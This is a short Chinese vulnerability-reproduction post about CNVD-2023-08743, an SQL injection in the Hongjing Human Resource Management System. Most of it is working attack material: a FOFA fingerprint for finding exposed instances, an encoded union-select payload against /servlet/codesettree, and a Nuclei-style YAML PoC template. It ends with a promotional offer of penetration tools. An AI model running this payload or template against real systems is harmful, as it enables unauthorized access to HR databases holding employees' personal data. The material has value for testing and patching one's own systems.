【漏洞复现】CNVD-2023-08743

【漏洞复现】

CNVD-2023-08743

【漏洞介绍】

Hongjing Human Resource Management System - SQL Injection

【指纹】

title=”人力资源信息管理系统”

【系统UI】

【payload】

/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d

【Poc】

id: CNVD-2023-08743

info:
  name: Hongjing SQL Injection
  author: xxx
  severity: high
  description: /
  reference:
    - https://
  metadata:
    fofa-query: title="人力资源信息管理系统"
  tags: hongjing,hcm

http:
  - raw:
      - |
        GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header,"text/xml")'
          - 'contains_all(body,"TreeNode id=\"hongjing","SQL Server")'
        condition: and

免费领取安全学习资料包！（私聊进群一起学习，共同进步）

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML，PHP，MySQL基础学习，信息收集，SQL注入,XSS，CSRF，暴力破解等等

 

应急响应笔记

学习路线